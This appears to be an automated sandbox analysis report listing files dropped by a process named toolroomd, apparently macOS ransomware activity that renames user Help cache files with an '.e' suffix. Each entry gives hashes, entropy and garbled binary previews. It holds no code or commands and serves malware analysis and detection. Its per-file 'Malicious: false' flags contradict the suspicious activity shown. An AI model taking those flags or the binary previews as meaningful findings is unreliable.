SHA-512:	7B3D94981CEC32149075B21033BE01E30CEF6A994C09FAC3175809AA21C6762C76AA29A3F9F8C4010A3813E8EF3591E1271BD47430E563FE31B174CCC5773CE6
Malicious:	false
Preview:	f...#D....".......o+............]s.AUF9.......f...#D....".......o+......p.....]s.AUF9.......HX3...Bh.Zr..=...q.A"&6<.."a..HX3...B.<..Yv.m...-...3o1..!......n...........^UN ...:.<..Yv.m...-...3o1..!......n...........L,._e...^UN ...:.<..Yv.m...-...3o1..!......n...........D..-><.}W.x..v3.E..o.^UN ...:.<..Yv.m...-...34.?cR......n...................d..(.......'F.[..(...t5.a..x..b..}R..'.w.r....S..M.1Ga...$.In....V...n.............(..L..m.42.L..R...j/.c^UN ...:.<..Yv.m...-...3o1..!......n...........U.e.E~.^UN ...:.<..Yv.m...-...3......??o....^..).p.>x.......2.Y?.k2...1Ga...$.In....V...n...........s.H...av......e..yh\...8.9v..Z.....-...3......??o....^..).p.>x.0.>..cu.^UN ...:1Ga...$.In....V...n...........F....@@O..+..t..O.....^UN ...:1Ga...$.In....V...n...........F....@@C.......^UN ...:1Ga...$.In....V....#...........F....@@.K..i.a,.g......h%.......&..x.^UN ...:..g.....o1..!...o....^..).p.>x...... 6..h%..........K6....."s..#f8.}...3.G....@..4[.....!

/Users/berri/Library/Caches/com.apple.helpd/.Cache.db-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/com.apple.helpd/.Cache.db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	356855
Entropy (8bit):	6.663404432540086
Encrypted:	false
SSDEEP:	1536:14VUaMOskrcCkbk7ny49puEc+PwXIzAUL5jOAbs9sj/jYMawdjCXb0NXIFws6na/:10cA/Y86AxF/u+aWaD/siMQF
MD5:	C697A32CD3B214CB03F557D3C08ED33A
SHA1:	8965AE07279DFB4F761000BCD39AC910BC34638D
SHA-256:	260F7A29F8ACBF26A6FC0A5F154AB58F935ADA099ACC50C5C8575618BB819253
SHA-512:	BE6C5A05FB2392FE8E734C32F4A02EF5D7C3B05273982BA9AB727DB7EAC723ED949B1F051ED891299E82512CA31C1B38407BBA126CC9C162F06F0EA242E974A1
Malicious:	false
Preview:	..d.=..._t.........X..\...Z...6<.."a....I,`...ax..J.....7...x..7...xt....Sq6<.."a..g..{}:.c.P.>.T.Z..Y#)j12"..-..!....`..u.;2.c-/.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.apple.helpd/.HelpCache.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	20459
Entropy (8bit):	7.97471331228726
Encrypted:	false
SSDEEP:	384:Ts9XG/sppf3lRGH25hhO1iCI2aeV9ygMipuF2X0X23ZnK:oW/aV3lg2zhMaeVEpOI40XoZnK
MD5:	964D02DFF55153139737076289BA4D17
SHA1:	57E5BAE677970EB45D93BCFD664DB9046A2DD552
SHA-256:	845493E3C341EBA22D84D070C2BEE3E908E2EC4328BB6E5FD9AA9CB780C0E4E5
SHA-512:	A7DB73E38B2032407B5A0AECEF0E38CE5E2BF8EAA083E03DB0F0AAE4445FC883C5986EB8A86C5041B2A23E52B10E1C645CAE051437384203C36C5C4C91984C1A
Malicious:	false
Preview:	...a>k..M.........]..........zN\|...F...=.... ht..8....c~.o5..e...v....s..Z...;..>..Vf.#.J...^8pdJ/..'.s.1y..xXH..%c.@/.-....K3.A..N.T.........B...7.....y..:4.-.....2i.p..u.q................".6..AW.....@.M..{....A.s.O.......0.ic.z.ky...q...X$2...l:.v.=.yXn..N.\..r..#^..H..k..<K.9.z~tf.....e..:7..=....( !.B.5....5....w..~....W..4..L.\,Y.8..,.....X..E..z..-2.3......R...zI.\|9.4.._&.....+....&..,...;e.(..r.& _..Y....\|.,.....X......-.^...c.......XX.c..h...du.?..eF."....G A~kj..-0..T..^..E.4...IC.....0..Z.a:.;.&.N.....}.@.l.p.......)....s..n..a.AT.$..9`....c;...\|.....P......cUd..>p\|...l...".i.....a..}.W1..H..5.....(..5g0..p........F.@..._D.Z)_...G..JN.S.....kqn.i..}.@..0.......O..=$'@.</7.vD.....g*..?..Z.Ygp..........r]C7k...$......&...gu.^.^.L.../1.+g..H.0..}.QR..m.;.G.E..._.M.ws.r{.4..'......1...h....r_...p7......U..2.B.w.N.$...q...7-..\|\..` .....WR.`k. N..e....v%._.....Y...2R.b.)=u...7..WW....d.c.'.i!..O\|. .OjSy.]..t.:.../.N

/Users/berri/Library/Caches/com.apple.helpd/.HelpindexCache.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	7082
Entropy (8bit):	7.884479959149469
Encrypted:	false
SSDEEP:	96:MsJ12HB1LJEp2GSCcKr2fvu7AtCsyJZaoR0wKjg5us5NV63EuFY7fltZimYZtmdS:XJ+BLhCFKCLJZrlK0zV6JCvCDmdhwmQ
MD5:	2C0E8FF5E5914CE88E9EE9D300B0BBAF
SHA1:	8882AE8D77B6A75F5DB9BC112C93B027C40C3E40
SHA-256:	C222FF6C725EEDD45B04BBEA6FADE00D9F4B3E788450DFC0594F30FC8E493421
SHA-512:	53B346A11F506F4086AF5462BD37369A3CD6187356009E94859994655A9C917A7D368E1AD90C253BB8E2E6725AC86FCA9D47FD97A316F60AFA1B88DBB05E792A
Malicious:	false
Preview:	...a>k..M......x.l7w:....b?Dq)zN\|...F...=.... ht..8....c~.o5...`...f....:.....r.m.7..`#@1.d.y.....A.`.ia.&.D..D.....Q]X<.'.gD.L.7n9~P..B}...6.x3...q..h.o.k.rLG..k..r\_...)>..){.4#...T.\..9Dz..W...,.O..^..pX...S..1.0x.T..8.....P...[.y...z(........mn......N.....(..K..f...J...)H.~....(] .M...j....U.......g..PH...'.%@.....yx>T.`Is.NRs=..E......4qB..f=..r.9.:....@U..W.!$.5...Z....F..?...wq0.."...;J)P@.3..286.0..=..P!%i..uQ..t.(..Dc#..J..F"..vH8...\...m.."..}...A`...."%....i.S;....x..V...JC.9..qe....T$. _.T1q..5.X..rJ.l.k.....H.o...!..+..\..c..1Hj)QI..".n..`.sC.c&.. .q..`.......E2Z........v.............<%.a....-..}.U...:..,.N.#........#.....~.(=.(..s....E.E..0.R.Q.(."...\|{...x?2..6......W....%.o9{..j4k.T...l.u...)..)0V...b..J....w.P8....2...7.e.E6~.t.........F...'.H=m.9..q.#.0......v.C...../.[....R...z.X..k..Q..........,...&,......D..{zmp...;a...F..,7'..~.z;.z"..[.*lv.GA.{.........a..c..%..-........k.M..!.j_kn.g.....E.W..c...U..........\N..;?

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.ActivityMonitor.help10.13/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	39268
Entropy (8bit):	7.56640051017446
Encrypted:	false
SSDEEP:	768:GMKLH8M5us9Wi1N6jkGUNPdjkG+7Xt2O4Kl:GMoas96Ab1jD7G
MD5:	C4533A3C9F24395773C4DCE36C86C3DC
SHA1:	DE5CC75CA15F4C18CFB9CE767AE2633B701C0885
SHA-256:	E3ECCB2F7D31D4536DAE4BD670F9239D232685F8BFA8340C1694BD4E22E0E3CD
SHA-512:	9756041C561B9AC0688DF459A74E51414DCF37DA6A77D407457DBBF87423AC2ACBA0F210E0876F83683C870C7E376460B5742E1A5507AD31A240BE949CB5387D
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.,D......".."..b........O..(.6I...>.F.=.u..['2..SHIPC. ...p.....v..O......!.V.....tO..z$.i.Y......^...U./.a./.....2..A.@!,....{.;%-s...y.E4(e..n.h......'V6.OG...7E..j...B13...>s.{...u..N4.f...w......uj.%..3.^D$.....N..gcL/j...M.O..P.....^..p...r%....X.v.....D<.d.v....\.4....kc.#A.\|t.....S!......,.....c.;..U.;.B..l....<.l...G..T....Z.<I{..p..,9y...<..<..M..{.........>......Co.%.............8W..s....G.z....dh...<..!.u.Nf.B...,/(-..^...2...dhY..P..H.y.....r.~R.6..M..2...x.C.R.Q..O...<..yn.%..wZ.`...{..s......}...C. ...p.....v..O......!.V...,...5.....G..T..{.:..{..p..,9y...<..<..M..{........{..s......[..!TD..9....G."...=.P.n..i.6..M..2...x.C.R..x.{.>./CI<..M...s.....[$..f.N-o.......h...#.....v..O......!.V....D...L..<.d.v....R+L....kc.#A.\|t.....S!......,.....c.;..K@..5....I/...~.k!..G{...H. ......*,....j.k..Y3."...s]...

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.AddressBook.help11.0/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	68982
Entropy (8bit):	7.809504000166052
Encrypted:	false
SSDEEP:	1536:Gp+PgUOIqVxDhnwa8gTwh8MsJZNnsqyzIlgm4XiFCW3:Gp+PgUOIqVxG7h8MsJZNn9yzIyFW3
MD5:	811D4B94CA201298EAE13666E71F1D3A
SHA1:	A6D44CA5FC1D3A63F562DDAA3DB592C55891873E
SHA-256:	9841F1F60469C89757B8E3E8DB1E3477429125B491D2A31324FCCCB743B61520
SHA-512:	ED784C92D19D6D78C1E086E1B5A295392C59754377FEEDA02B1BA6A790EE426768A9109E8B36B742E51AF6E67B0BD4A9A1CADF3E8FDFC6ED59060A13B1EFDDA6
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:......Wu3;..B.....>t.....j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{.;%-s...y..v..ry..^...2...b....}.+..+!{...r.~R.6..M..2...x.C.RsrY5p.yih...."..1.......+...../.a./...A...U..D!,....{.;%-s...y.........^...2..Y.....]...0..L....r.~R.6..M..2...x.C.R...M...W..l...c1.....J2aD../.a./...A...U..D!,....{.;%-s...y4...>3...^...2...y.....Q..x..:o...r.~R.6..M..2...x.C.R...lpL.f<n"\|..@.{.)w.}.r.f.7..S....\.. Z...P?.P.....^..p...r%.>..D...%}m....{...M.J.!b.:.........}......h...#.....v..O.........J.."&..f.~.8..........Y+.ou.^N...<..>s.{...u..N4......@{9[)#:[o.g.$...=...sx.{..p..,9.....A....M..{..8..i?s...`S.z@...{.)w.}...k[....Zc....T Z...P?.P.....^..p...r%.._..#/.Zz.b1k..G.g.$...=s.hO..U.{..p..,9.....A.......X8..i?s...&...^..1......G.r.,6d/.a./...A...U..D!,....{.;%-s...yF.d.....^...2..1..T...[..W..6>...r.~R.6..M..2...x.C.R.G..C+\....^.X..1.........4...

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.AppStore.help2.3/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	32059
Entropy (8bit):	7.688523216628986
Encrypted:	false
SSDEEP:	384:JorT3a3d9wU4cCwOnIygdr0oDDz5EBJ4MiGqC1EViO/LAXox2yFhR6Bk2:GrTed9w/cAnIymAoD3+J4s2LaS36BL
MD5:	08535FC161EE47265B16A8F811A8993B
SHA1:	758DD5BDC87DD33BF79454D327B8977E33886B91
SHA-256:	D945AC369D8CB2186AB9FE4771040F043C1F9D66281050E9E87416A36345EB1D
SHA-512:	C4917D1B9D40863393C69A6F1C15A2A957CA5161A187B73293D6361D26DBB41C0CF40ECEE4E24C03B36AC725B4337F1191A4F5E24CE5ABD0220F129A2B93AF8F
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.,.qH.....>.#...).R.n...J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%..X..^N..(c..bV....z..j..T.9n.[?.Xh2...0...h...#.....v..O.......P....I..T..p..1..e{..m.*...C6kc.#A.\|t.....S!......,.....c.;.2..L^.R;.[Uo..#.3,...?.U..8..b/.a./.....2..A.@!,....{.<q....[z&...........2.M.?.B..1...>{..p..,9.n..Dr..M..{..?..<.1w........-T.k.N.\.....3..YJK.......ilBI..>s.{...u..N4_.x.D.'3...aF..2O.&.)..B.I...+.(.Ov.....s....G.z....dh...<..!.O.....p..M...........>f....J.M.A`...R....M.O..P.....^..p...r%.U..%uV.....b`..io..$.....v.....kc.#A.\|t.....S!......,.....c.;......f.....@....h....>f.p..x:p/.a./.....2..A.@!,....{.<q....T6.....8R......b.w...'.....jF{..p..,9.n..Dr..M..{..?..<.1FX....4.7#.o..3....'e...(1.\.......\|%"...J..%....c.!._qlA....x.....Y...t......0.g%.},..eJ....m....8..pv.;J.B.:...q.A"&...q.A"&.S.?r.F.h.]J."...>..K.......2B..m....L.

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.AudioMIDISetup.help3.2/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	44196
Entropy (8bit):	7.757518158310154
Encrypted:	false
SSDEEP:	768:Gg4vTtwzzFt5jnx38SMy14mmqgYpn9ITQxSfYOUvqF13:Gxbtwzzr8SkTqgYpn96rQRqFx
MD5:	FF633C43214C179BE1A021BFA7B1511B
SHA1:	35941DD8500299BDA2BDD490D10E21410101151E
SHA-256:	5B4E5CC0691B275D4CE11CEE83B1207C834D18CD105E526988A50E5F093A6EA4
SHA-512:	B3B37DE761B35EA5205002659BD7D064B4E93418CD610F689C69E7236D99C1E3367BAEBD126454EB82659B4DB03F242AA0C100E99B43B995460F8D5E4E77D923
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.&..MH.O....69..Ke_(...z..J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.t.........^X..F;.zz....Z..#.V.k.oP......z....dh...<..!.Be.lY.J....^7x.I[......o..,....{..p..,9.n..Dr..M..{..w..}{.i..=.......rY...o...)....2+Q...\c....ilBI..>s.{...u..N4.....0~kak.].]. f,.[.MGq.c@...yn.....s....G.z....dh...<..!....E....%m..s....^...2..@.i.T...........r.~R.6..M..2...x.C.R.K.oL.gu..t.0..\|).j..F..j.{......m#.y....>s.{...u..N4.....0..CJt.D..8.Z.O90tb........\|q..E.z....dh...<..!.C.....{.....U.....V>z)b..kc.#A.\|t.....S!......,.....c.;.._\.......Rk...O..fz.{..oe.../.a./.....2..A.@!,....{.;%-s...y...[.{.b...9..N.s...J}_c.c.....{..p..,9.n..Dr..M..{..w..}{.i.M....Q\|..N.v. .x....<..kc.#A.\|t.s.L..br\..P...K....c.;.9...6F.jH..L:/.a.g....,.\M..... Z...P?.P.....^..p...r%.{*.C.{[xA.'.)<'.....^6.V.F.Dy$.4EV.B....h...#.....v..O.....e+?.1K..d{....7.'.F.=.;

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Automator.help2.8/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	56773
Entropy (8bit):	7.49876467378157
Encrypted:	false
SSDEEP:	768:GobeTwKTLdvR8vSe1x86u2ruMQ2m8Zd/thhIeqOs+0q2hapgy5TwqB9Q0+KX2yUH:GUeTfP78DjgKttfT1QWtG7zuWTffBL
MD5:	275C74291F0C13CE7765A5D3EC549069
SHA1:	1C89F3D193B11BFA89B08D52E51C1180E621D165
SHA-256:	A169DCF5549BEB1BF62C91688AE900928F9C4A4031F6D4C381F5C6D7F1CB509D
SHA-512:	CCC89AE3E360113A120D1C27DC74787D972F3E805FBC37B49A92D7BD104A92A4D525AF711EB09D7D7106450A1FD8C650B5AB953662FC50F75EFD5A2659702D69
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.T.bt....".U-../Xi..Amv..TJ.k.S.U.4.......v^.;....7...vP...Z...M..{...x..{......2.e.u.kI..}.oc....!.N-o.......h...#.....v..O......A..8b...+..AQ(..\.&K..U.c.NO.kc.#A.\|t.....S!......,.....c.;.9Y. .b.s....M).....y..d.t\.A..r..{..kH..>s.{...u..N4....B.........e...Z...S....,{..p..,9P...Z...M..{...x..{....{.-.n.....1.).o.B&u...F.%._..>s.{...u..N4X#;.[N...8.0...<...Z4./..;..6.)#n..H>_.z....dh...<..!..Mn7@..~.....3..h.@I4.Cj.z...\...m,;..W.6..M..2.....c....H.....%.......ic.-..U.sy..y..{..p..,9.n..Dr..M..{....IK..N7..;..A..~/......l...=.,T>.!...5.RK..6..M..2...x.C.RC........._...9.AIZ.r.....-8.F.}kc.#A.\|t.....S!......,.....c.;.*o...f.YWp.......\|8-..h.i..}..n/.a./.....2..A.@!,....{.;%-s...yT.......b;..y....w...w...Z'..3....u..P.....^..p...r%.....h.7.^....O..v.E..7.....%....ilBI..>s.{...u..N4.....JMH3}>.6....j.f.vV@.D8...&....bx..n..0.....

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Calculator.help10.13/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	15442
Entropy (8bit):	7.0872187822372466
Encrypted:	false
SSDEEP:	192:Jois2B8Gg4dGpLhh07qHrBrXNdgpP6BBziWT4SrBrUP:JoMdNQpLwIrdupP69UKrm
MD5:	E1EDDA56AED03A704565976C03174B01
SHA1:	532C7A07AE8E3EAB4AE560A87C3612BF1E513F5B
SHA-256:	360254752C2C474D0BF5693D07C6F30580781C095326A643B8BD8CF59F02C1D1
SHA-512:	D01081F34938BCB7C66DF35BA001CBEEBABBFC1E7D887E825CC0BB4AD58BBA7EBC4B56A3C943562C8EF5F7B95BD46C4BBBB14CAA36AB38268F53633ABBA4F3F0
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:....T..\|\?....%.w..t....h....j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{.."..;.t5.'6...<;...L.}g.......5If....../..u. ...1....J....v...I......$..j........]..hD...P...1.1..9.....u..}R...9..[\|z~q....q.A"&...q.A"&.;...b.k..5..;....q.......C.=.!.g3SX.!.`...q.A"&...q.A"&...q.A"&e(...'....l.6....g.H.0..z.2?Z.Y..y..;..o6.n.~h..1.b...q.A"&.TEu...6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&a.(."Lz.6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&.P....O6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&......6<.."a..B...ce/....q.A"&......S..[\|z~q....q.A"&...q.A"&.......R..[\|z~q....q.A"&...q.A"&$.`n.`B.6<.."a..B...ce/....q.A"&.-"e.^>....q.A"&...q.A"&...q.A"&.%.d...\|..[\|z~q....q.A"&...q.A"&.P...*.O..K.....B...ce/....q.A"&........K.....B...ce/....q.A"&.......R(.....F?..8%...vm\....@X..2.hn"A.(.. .. N..i.Q.[......2."..8......:.,.j....d.... ."

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Chess.help3.15/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	13394
Entropy (8bit):	6.641256523368862
Encrypted:	false
SSDEEP:	96:Jo4T/rowe/TQsxwUyGaMWK8686UO1hZdab42KICSARX53/M4d9t0wu:JoQz2B8GaHK86rU2kb42pNOX53/MSIB
MD5:	4D2B844969AE25C0A675DF6333E48098
SHA1:	9F49FC675AC6BD777597D98FA31602B366AC44DD
SHA-256:	D4E10C753FE936906454C04DA54145AE380B8F371FEB96FEF1B83E2797697F7D
SHA-512:	BF53710A1FC18836701717A1B8DD44765329E1CFCA6A64A75E6087996CEC68A8A6D6643BDC093446CCF685DE66AA6AC82A3BFF2550EFB7CB4B533DB9E15F1F56
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:....T..\|\7........R9:..X....j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{.."..;.t50.P.G4U$...L.}g.......5If....../..u. ...1....J....v...I......$.I..:.]R!..z:.Y.\|..b..{..J.+...d..}R...9..[\|z~q....q.A"&...q.A"&.;...b.k..5..;....q.......C.=.!.g3SX.!.`...q.A"&...q.A"&...q.A"&e(...'..a.........g.H.0..z.2?Z.Y..y..;..o6.n.~h..1.b...q.A"&.TEu...6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&a.(."Lz.6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&.P....O6<.."a..B...ce/....q.A"&.......R..[\|z~q....q.A"&...q.A"&......6<.."a..B...ce/....q.A"&......S..[\|z~q....q.A"&...q.A"&.......R..[\|z~q....q.A"&...q.A"&$.`n.`B.6<.."a..B...ce/....q.A"&.-"e.^>....q.A"&...q.A"&...q.A"&.%.d...\|..[\|z~q....q.A"&...q.A"&.P...*.O29.H..`.B...ce/....q.A"&......29.H..`.B...ce/....q.A"&.......R(.....F?..8%...vm\....@X..2.hn"A.(.. .. N..i.Q.[........ibG..X>f..V..,.j.......o.!.

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Console.help1.0/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	32395
Entropy (8bit):	7.669902434831749
Encrypted:	false
SSDEEP:	768:G9IfaLdb0gF/zRA/qxb0nDqtHm2lMaEYn:GSfaLdwaLRgqxwW7CaEYn
MD5:	D68F9BFB689D927FE68CF150723D7AFF
SHA1:	66685B1B6CBAD4E509938C65B6C4F0D270472911
SHA-256:	0FF6C21C99FC2FD9E2B2830C8A00AD7117ACA765CD4ADE27D2147C0C865A3137
SHA-512:	BEA39383E46B13C06C4F09B0076789D235B54F2AEC82AE5E183B8076FD63B043B3B26B3AA84F47D6CE847C2386F7E670A266F4E19158BC5F2C1A609CB94C529E
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.Q...Q..dAC.WL.-Q]...i,...J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%..K:.N.ID.tB...\.....'n..DVt....4.=P...V...h...#.....v..O.....)k.}..>5I-.g.....l..,y..\|..hkc.#A.\|t.....S!......,.....c.;.A[c.......5..m.......G...i...:.6/.a./.....2..A.@!,....{.."..;.t5^......jd... ....-P.[.l...3}3...u..P.....^..p...r%...V..br....\...x@[.$;..?.....y.....ilBI..>s.{...u..N4..I...D..q....=.5..B..D..-Z..r.s....G.z....dh...<..!..H.Z..%.TE..G;1!...Ms..O...h..Nkc.#A.\|t.2..........,.....c.;......Vy..,.9-7.........g.NSA.QK...s....G.z....dh...<..!..H.Z..%..m...[.R...7.,..ha.1..E?/.a./....A-..W.!,....{.."..;.t5ha.1..E?..D.0.;...K..t{..p..,9P...Z...M..{..cr.R...i-.%.cI[.....'n.w.t.f....3....E....h...#"v}O.:~n.O......9../..M.N".r%..Z<.3....b...6=...X. .C.d..V.!^..W .=....`..y[bg./..3.w.......&..j.I=...m..'V+.*74.rJ.#.\...6<.."a.....q.A"&...q.A"&...q.A"&

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.DVDPlayer.help5.8/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	60733
Entropy (8bit):	7.798224007880581
Encrypted:	false
SSDEEP:	768:GAv7l72NMU3J7CWtGrmqGduR3VimCvqycQybngaYGYfXj+ZaPkreLNEDAK2Sct:GAv7l7O3JmhrmDMC04X5P+w3K2z
MD5:	5BFE02B9323A248FB66FDB3B05D64669
SHA1:	EE63247506775BFB8DE7A7C07925814E0CF9CD27
SHA-256:	8E5FCD276EF0F5EE38F9FE8A144C15B01B0D3F7A7EBDB0B600752368301243E7
SHA-512:	1C03C99F4420A9E219FA1E20C77E72657F48C8A3AAF4D1F58B3FB9E13B876FA8535763611367C0F55858A5DA0488148BE2FEB8CFDFB736024FD1ED8169EF9DF8
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.5.k.....x.3...."I.r u...J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.!f...z.B<.wtE.h].f.5.[.....[..&....V.:.....h...#.....v..O......_..&.`...hvy}.k7....."......+kc.#A.\|t.....S!......,.....c.;...u..\|.......uo....8...J.Hy../.a./.....2..A.@!,....{.....q.qi.<..uq\|i....".<w}\,D$j.....~"..z{..p..,9.n..Dr..M..{........<zt]....ir..E.0...o.....TK......ilBI..>s.{...u..N4U.9..`,...y..&.$.brd..'.jw......0r.V...P.n..i.6..M..2...x.C.R....t......`ix(....v.a..k8X.${..p..,9.....A....M..{........?.5M^.lK<....Q...%m.k{..p..,9P...Z...M..{...............f.5.[..;.<4....."....1...h...#.....v..O......d.).l.......;[.!0"...H..}.0..kc.#A.\|t.....S!......,.....c.;....Lp......S.xl...H.../....I.2#....C.l...2..A.@!,....{.....q.qi..._P...B...o[Y(.{+....;'b..t*.{..p..,9.n..Dr..M..{..G`.d..@Q.....i.L..LD..".!.........XOg....ilBI..>s.{...u..N4...:.o..

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Dictionary.help2.2.2/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	13394
Entropy (8bit):	6.759507968837386
Encrypted:	false
SSDEEP:	192:Joz3dgZfQDu4uKM7TdkYk62eh1JNng6WjUNzARPj:Joz3dwQD1M7SYk69JNKM0j
MD5:	98B51755E8B3CDDE7EB4BBC5AFC46CF4
SHA1:	FAF54AEAADA59BC36B5D3B8E4F2333829AFEC551
SHA-256:	AA6CDB2692B33A9B390DBCAC0AA8722974AF0D8B9D860F54E54F4D7B387CA5B7
SHA-512:	00C4F15D32F2EB48EA643E6E3B42854271520A1569898D09D2B5C86C813287505AA4FA55CECAA8A7E3049A2046E8026B7EF9C07D4DBE0E6146C1329725BC6FA2
Malicious:	false
